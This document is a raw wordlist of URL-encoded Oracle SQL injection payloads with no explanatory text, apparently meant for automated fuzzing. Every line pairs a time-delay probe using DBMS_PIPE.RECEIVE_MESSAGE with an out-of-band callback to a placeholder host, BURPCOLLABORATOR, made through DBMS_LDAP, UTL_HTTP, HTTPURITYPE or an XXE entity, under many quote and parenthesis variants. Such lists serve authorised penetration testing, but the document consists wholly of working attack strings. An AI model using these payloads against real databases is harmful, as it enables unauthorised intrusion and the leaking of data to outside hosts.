"));SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- )+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
")));SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- ))+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`;SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- )))+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`);SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- '+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`));SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- ')+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`)));SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- '))+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- ')))+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
)+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- "+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
))+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- ")+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
)))+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- "))+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
'+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- ")))+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
')+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- `+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
'))+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- `)+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
')))+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- `))+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
"+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- `)))+UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
")+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- ;SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
"))+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- );SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
")))+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- ));SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
`+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- )));SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
`)+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- ';SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
`))+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- ');SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
`)))+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL)+-- '));SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- ')));SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
)+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- ";SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
))+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- ");SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
)))+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- "));SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
'+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- ")));SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
')+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- `;SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
'))+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- `);SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
')))+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- `));SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
"+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- `)));SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
")+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- +AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
"))+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- )+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
")))+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- ))+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
`+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- )))+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
`)+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- '+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
`))+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- ')+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
`)))+UNION+SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- '))+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
;SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- ')))+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
);SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- "+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
));SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- ")+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
)));SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- "))+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
';SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- ")))+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
');SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- `+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
'));SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- `)+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
')));SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- `))+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
";SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- `)))+AND+1=(SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL)+--
");SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- +UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
"));SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- )+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
")));SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- ))+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
`;SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- )))+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
`);SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- '+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
`));SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- ')+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
`)));SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- '))+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- ')))+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
)+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- "+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
))+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- ")+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
)))+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- "))+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
'+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- ")))+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
')+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- `+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
'))+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- `)+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
')))+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- `))+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
"+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- `)))+UNION+SELECT+UTL_HTTP.REQUEST('http://BURPCOLLABORATOR')+FROM+DUAL+--
")+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- ;SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
"))+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- );SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
")))+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- ));SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
`+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- )));SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
`)+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- ';SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
`))+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- ');SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
`)))+AND+1=(SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual)+-- '));SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- ')));SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
)+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- ";SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
))+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- ");SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
)))+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- "));SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- ")));SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
')+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- `;SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
'))+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- `);SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
')))+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- `));SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
"+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- `)));SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL+--
")+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- +AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
"))+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- )+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
")))+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- ))+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
`+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- )))+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
`)+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- '+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
`))+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURPCOLLABORATOR/">+%25remote%3b+]>'),'/x')+FROM+dual+-- ')+AND+1=(SELECT+HTTPURITYPE('http://BURPCOLLABORATOR').GETCLOB()+FROM+DUAL)+--
